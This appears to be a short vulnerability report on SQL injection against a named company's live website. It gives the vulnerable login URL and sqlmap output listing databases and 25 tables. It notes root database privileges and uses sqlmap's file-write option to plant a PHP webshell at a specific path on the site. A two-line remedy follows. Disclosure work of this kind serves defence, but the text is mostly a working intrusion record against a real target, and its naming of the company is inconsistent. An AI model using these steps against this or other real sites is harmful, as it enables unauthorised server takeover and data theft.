There is SQL Injection on the kibablendiamond official website.
The official website of Kimberly Diamond has SQL injection to get webshell.
Sqlmap blind Injection
Logon page
http://www.kimberlite.com.cn/index.php?r=site/flogin
Injected Database
web application technology: PHP 5.6.15, Nginxback-end DBMS: MySQL 5.0.11available databases [6]:[*] information_schema[*] kella[*] kimberlite[*] mysql[*] performance_schema[*] test
Inject the kimberlite table
Database: kimberlite[25 tables]+------------------+| join || user || application || brand || caption || classic || classic_list || config || desginer || desginer_list || huodong || images || jiamengshang || jm || kd_list || member || new_push || news || picture || product || product_categroy || product_type || source || story_video || zuanshi |+------------------+
View User Permissions
current user: 'root@%'
Permission to write files
--file-write http://www.kimberlite.com.cn/assets/197aed28/js.php
Obtain webshell
Solution:
1. Minimize User Permissions
2. Use precompiled statements.